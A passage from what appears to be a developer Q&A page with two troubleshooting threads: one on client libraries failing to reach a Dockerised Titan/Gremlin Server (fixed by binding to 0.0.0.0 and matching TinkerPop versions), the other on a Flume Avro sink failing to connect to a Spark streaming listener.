16553 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded gremlin-groovy ScriptEngine
17410 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.GremlinExecutor - Initialized gremlin-groovy ScriptEngine with scripts/empty-sample.groovy
17410 [main] INFO org.apache.tinkerpop.gremlin.server.util.ServerGremlinExecutor - Initialized GremlinExecutor and configured ScriptEngines.
17419 [main] INFO org.apache.tinkerpop.gremlin.server.util.ServerGremlinExecutor - A GraphTraversalSource is now bound to [g] with graphtraversalsource[standardtitangraph[cassandrathrift:[cassandra]], standard]
17565 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/vnd.gremlin-v1.0+gryo with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0
17566 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/vnd.gremlin-v1.0+gryo-stringd with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0
17808 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/vnd.gremlin-v1.0+json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerGremlinV1d0
17811 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV1d0
17958 [gremlin-server-boss-1] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.
17959 [gremlin-server-boss-1] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Channel started at port 8182.
1/21/17 4:34:20 PM =============================================================
-- Meters ----------------------------------------------------------------------
org.apache.tinkerpop.gremlin.server.GremlinServer.errors
count = 0
mean rate = 0.00 events/second
1-minute rate = 0.00 events/second
5-minute rate = 0.00 events/second
15-minute rate = 0.00 events/second
180564 [metrics-logger-reporter-thread-1] INFO org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics - type=METER, name=org.apache.tinkerpop.gremlin.server.GremlinServer.errors, count=0, mean_rate=0.0, m1=0.0, m5=0.0, m15=0.0, rate_unit=events/second
Symptoms
So far, everything appears to be working as intended. The logs indicate that I am able to load srg.properties and bind the data structure to a variable called graph.
The problem appears when I try to connect to the Gremlin-Server instance over the exported port 8182, for example using gremlin-python:
# executed via python 3.6.0 on the host machine, i.e. not inside of Docker
from gremlin_python import statics
from gremlin_python.structure.graph import Graph
from gremlin_python.process.graph_traversal import __
from gremlin_python.process.strategies import *
from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection
graph = Graph()
g = graph.traversal().withRemote(DriverRemoteConnection('ws://localhost:8182/gremlin', 'graph'))
produces the following exception ...
---------------------------------------------------------------------------
HTTPError Traceback (most recent call last)
<ipython-input-10-59ad504f29b4> in <module>()
----> 1 g = graph.traversal().withRemote(DriverRemoteConnection('ws://localhost:8182/','g'))
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/gremlin_python/driver/driver_remote_connection.py in __init__(self, url, traversal_source, username, password, loop, graphson_reader, graphson_writer)
41 self._password = password
42 if loop is None: self._loop = ioloop.IOLoop.current()
---> 43 self._websocket = self._loop.run_sync(lambda: websocket.websocket_connect(self.url))
44 self._graphson_reader = graphson_reader or GraphSONReader()
45 self._graphson_writer = graphson_writer or GraphSONWriter()
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/tornado/ioloop.py in run_sync(self, func, timeout)
455 if not future_cell[0].done():
456 raise TimeoutError('Operation timed out after %s seconds' % timeout)
--> 457 return future_cell[0].result()
458
459 def time(self):
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/tornado/concurrent.py in result(self, timeout)
235 return self._result
236 if self._exc_info is not None:
--> 237 raise_exc_info(self._exc_info)
238 self._check_done()
239 return self._result
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/tornado/util.py in raise_exc_info(exc_info)
HTTPError: HTTP 599: Stream closed
Suspecting a problem specific to this library:
1) attempt to connect to the websocket port with nc
$ nc -z -v localhost 8182
found 0 associations
found 1 connections:
1: flags=82<CONNECTED,PREFERRED>
outif lo0
src ::1 port 58627
dst ::1 port 8182
rank info not available
TCP aux info available
Connection to localhost port 8182 [tcp/*] succeeded!
2) attempt to connect to Gremlin-Server using a different client library, namely go-gremlin
Test case:
package main

import (
    "fmt"
    "log"

    "github.com/go-gremlin/gremlin"
)

func main() {
    if err := gremlin.NewCluster("ws://localhost:8182/gremlin"); err != nil {
        log.Fatal(err)
    }
    data, err := gremlin.Query(`graph.V()`).Exec()
    if err != nil {
        log.Fatalf("Query error: %s", err)
    }
    fmt.Println(string(data))
}
Output:
$ go run cmd/test/main.go
2017/01/21 14:47:42 Query error: unexpected EOF
exit status 1
Current Conclusions & Questions
From the previous tests, I conclude that this is an application-level problem (i.e. a problem at the websocket/ws protocol level, not in the host or container networking stack). Indeed, nc reports that the socket connection succeeds, yet both the Python and Go client libraries complain of an inappropriate (empty) response from the server.
I have tried removing the /gremlin path from the websocket URL both in gremlin-python and in go-gremlin, to no avail.
My question is: where do I go from here? Any suggestions or diagnostic paths would be most appreciated!
The main problem is that the host in your Gremlin Server configuration is set to the default, which is localhost. This only allows connections from the server itself. You need to change the value to an external IP of the server or to 0.0.0.0.
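For example, a minimal sketch (assuming the srg.yaml shown above is the file copied into the image) that rebinds the server to all interfaces before the image is built:

sed -i 's/^host: localhost/host: 0.0.0.0/' conf/gremlin-server/srg.yaml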
The other issue is that the gremlin-python server plugin only became available with Apache TinkerPop 3.2.2, while Titan 1.0.0 uses TinkerPop 3.0.1. I doubt that the gremlin-python 3.2.3 plugin will work with Titan 1.0.0.
Update: Consider using JanusGraph 0.1.1 which uses TinkerPop 3.2.3. JanusGraph was forked from Titan, so the code is basically the same with updated dependencies.
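If you do move to JanusGraph 0.1.1 (TinkerPop 3.2.3), the gremlin-python plugin installed in your Dockerfile would then match the server's TinkerPop version; the install step is the same TinkerPop mechanism already used above (the /opt/janusgraph path is illustrative, adjust to your layout):

/opt/janusgraph/bin/gremlin-server.sh -i org.apache.tinkerpop gremlin-python 3.2.3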
I am trying to connect a Scala spark-shell to a Flume agent.
I launch the shell:
./bin/spark-shell \
  --jars /Users/romain/Informatique/zoo/spark-1.6.0-bin-hadoop2.4/lib/spark-streaming-flume-sink_2.10-1.6.0.jar \
  --jars /Users/romain/Informatique/zoo/spark-1.6.0-bin-hadoop2.4/lib/spark-streaming-flume_2.10-1.6.0.jar \
  --jars /Users/romain/Informatique/zoo/spark-1.6.0-bin-hadoop2.4/lib/spark-streaming-flume-assembly_2.10-1.6.0.jar
Then I run a Scala script that listens on port 10000 of localhost:
import org.apache.spark.SparkConf
import org.apache.spark.streaming._
import org.apache.spark.streaming.flume._
import org.apache.spark.util.IntParam
val host = "localhost"
val port = 10000
val batchInterval = Milliseconds(5000)
// Create the context and set the batch size
val sparkConf = new SparkConf().setAppName("FlumePollingEventCount")
val ssc = new StreamingContext(sc, batchInterval)
// Create a flume stream that polls the Spark Sink running in a Flume agent
val stream = FlumeUtils.createPollingStream(ssc, host, port)
// Print out the count of events received from this server in each batch
stream.count().map(cnt => "Received " + cnt + " flume events." ).print()
ssc.start()
ssc.awaitTermination()
Then I configure and start a Flume agent:
1) Configuration: the source runs tail -f on a file that another script keeps appending to (the details don't matter here):
agent1.sources = source1
agent1.channels = channel1
agent1.sinks = spark
agent1.sources.source1.type = exec
agent1.sources.source1.command = tail -f /Users/romain/Informatique/notebooks/spark_scala/velib/logs/trajets.csv
agent1.sources.source1.channels = channel1
agent1.channels.channel1.type = memory
agent1.channels.channel1.capacity = 2000000
agent1.channels.channel1.transactionCapacity = 1000000
agent1.sinks = avroSink
agent1.sinks.avroSink.type = avro
agent1.sinks.avroSink.channel = channel1
agent1.sinks.avroSink.hostname = localhost
agent1.sinks.avroSink.port = 10000
2) Start:
./bin/flume-ng agent --conf conf --conf-file ./conf/avro_velib.conf --name agent1 -Dflume.root.logger=INFO,console
Things go OK until this error appears:
2017-02-01 15:09:55,688 (conf-file-poller-0) [INFO - org.apache.flume.node.Application.startAllComponents(Application.java:173)] Starting Sink avroSink
2017-02-01 15:09:55,688 (lifecycleSupervisor-1-1) [INFO - org.apache.flume.sink.AbstractRpcSink.start(AbstractRpcSink.java:289)] Starting RpcSink avroSink { host: localhost, port: 10000 }...
2017-02-01 15:09:55,688 (conf-file-poller-0) [INFO - org.apache.flume.node.Application.startAllComponents(Application.java:184)] Starting Source source1
2017-02-01 15:09:55,689 (lifecycleSupervisor-1-0) [INFO - org.apache.flume.source.ExecSource.start(ExecSource.java:169)] Exec source starting with command:tail -f /Users/romain/Informatique/notebooks/spark_scala/velib/logs/trajets.csv
2017-02-01 15:09:55,689 (lifecycleSupervisor-1-1) [INFO - org.apache.flume.instrumentation.MonitoredCounterGroup.register(MonitoredCounterGroup.java:120)] Monitored counter group for type: SINK, name: avroSink: Successfully registered new MBean.
2017-02-01 15:09:55,689 (lifecycleSupervisor-1-1) [INFO - org.apache.flume.instrumentation.MonitoredCounterGroup.start(MonitoredCounterGroup.java:96)] Component type: SINK, name: avroSink started
2017-02-01 15:09:55,689 (lifecycleSupervisor-1-1) [INFO - org.apache.flume.sink.AbstractRpcSink.createConnection(AbstractRpcSink.java:206)] Rpc sink avroSink: Building RpcClient with hostname: localhost, port: 10000
2017-02-01 15:09:55,689 (lifecycleSupervisor-1-1) [INFO - org.apache.flume.sink.AvroSink.initializeRpcClient(AvroSink.java:126)] Attempting to create Avro Rpc client.
2017-02-01 15:09:55,691 (lifecycleSupervisor-1-0) [INFO - org.apache.flume.instrumentation.MonitoredCounterGroup.register(MonitoredCounterGroup.java:120)] Monitored counter group for type: SOURCE, name: source1: Successfully registered new MBean.
2017-02-01 15:09:55,692 (lifecycleSupervisor-1-0) [INFO - org.apache.flume.instrumentation.MonitoredCounterGroup.start(MonitoredCounterGroup.java:96)] Component type: SOURCE, name: source1 started
2017-02-01 15:09:55,710 (lifecycleSupervisor-1-1) [WARN - org.apache.flume.api.NettyAvroRpcClient.configure(NettyAvroRpcClient.java:634)] Using default maxIOWorkers
2017-02-01 15:10:15,802 (lifecycleSupervisor-1-1) [WARN - org.apache.flume.sink.AbstractRpcSink.start(AbstractRpcSink.java:294)] Unable to create Rpc client using hostname: localhost, port: 10000
org.apache.flume.FlumeException: NettyAvroRpcClient { host: localhost, port: 10000 }: RPC connection error
at org.apache.flume.api.NettyAvroRpcClient.connect(NettyAvroRpcClient.java:182)
at org.apache.flume.api.NettyAvroRpcClient.connect(NettyAvroRpcClient.java:121)
at org.apache.flume.api.NettyAvroRpcClient.configure(NettyAvroRpcClient.java:638)
at org.apache.flume.api.RpcClientFactory.getInstance(RpcClientFactory.java:89)
at org.apache.flume.sink.AvroSink.initializeRpcClient(AvroSink.java:127)
at org.apache.flume.sink.AbstractRpcSink.createConnection(AbstractRpcSink.java:211)
at org.apache.flume.sink.AbstractRpcSink.start(AbstractRpcSink.java:292)
at org.apache.flume.sink.DefaultSinkProcessor.start(DefaultSinkProcessor.java:46)
at org.apache.flume.SinkRunner.start(SinkRunner.java:79)
at org.apache.flume.lifecycle.LifecycleSupervisor$MonitorRunnable.run(LifecycleSupervisor.java:251)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.runAndReset(FutureTask.java:308)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$301(ScheduledThreadPoolExecutor.java:180)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:294)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
Caused by: java.io.IOException: Error connecting to localhost/127.0.0.1:10000
at org.apache.avro.ipc.NettyTransceiver.getChannel(NettyTransceiver.java:261)
at org.apache.avro.ipc.NettyTransceiver.<init>(NettyTransceiver.java:203)
at org.apache.avro.ipc.NettyTransceiver.<init>(NettyTransceiver.java:152)
at org.apache.flume.api.NettyAvroRpcClient.connect(NettyAvroRpcClient.java:168)
... 16 more
Any ideas are welcome.
You should start the "listener" (the Spark app, in your case) first, and then launch the "writer" (flume-ng).
Instead of localhost, use your machine name (i.e. the machine name used in the Spark conf) in both the Scala code and the Avro sink configuration:
agent1.sinks.avroSink.hostname = <Machine name>
agent1.sinks.avroSink.port = 10000
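Putting both suggestions together, a minimal sketch of the startup order; my-host, flume_listener.scala, and the jar path are placeholders for your machine name, the saved Scala snippet above, and your local jar location:

# In the Flume config, point the Avro sink at the machine name instead of localhost:
#   agent1.sinks.avroSink.hostname = my-host
# and use the same name in the Scala script: val host = "my-host"

# 1) Per the first answer, start the Spark application first:
./bin/spark-shell --jars /path/to/spark-streaming-flume-assembly_2.10-1.6.0.jar -i flume_listener.scala

# 2) Only then start the Flume agent that writes to it:
./bin/flume-ng agent --conf conf --conf-file ./conf/avro_velib.conf --name agent1 -Dflume.root.logger=INFO,console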